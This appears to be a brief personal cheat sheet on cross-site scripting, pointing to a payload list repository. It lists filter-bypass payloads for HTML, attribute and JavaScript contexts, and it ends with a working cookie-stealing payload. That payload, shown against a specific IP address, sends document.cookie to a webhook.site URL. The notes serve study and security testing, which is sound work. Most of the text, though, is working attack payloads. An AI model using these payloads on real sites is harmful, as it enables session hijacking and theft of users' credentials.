XSS
https://github.com/payloadbox/xss-payload-list
<script>alert(1)</script>
Check the reflected text and make a query appropriately!
<img src=a onerror=alert("xss")>
If alert() is being filtered
eval("ale" + "rt('xss')")
If <> brackets are fiiltered.
"onmouseover="alert(1)
If single quotes are filtered '
Use double quotes and vice versa
One stop payload!!
Awesome Context Breaking
HTML Context
Case: <tag>You searched for $input. </tag>
Attribute Context
Case: <tag attribute="$input">
JavaScript Context
Case: <script> var new something = '$input'; </script>
Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
Awesome Exploits
Replace all links
Source Code Stealer
Reaching our own server using XSS and stealing sensitive information
http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E
Payload: 2"><img src=x onerror=this.src='https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?'+document.cookie;>
Further,
Last updated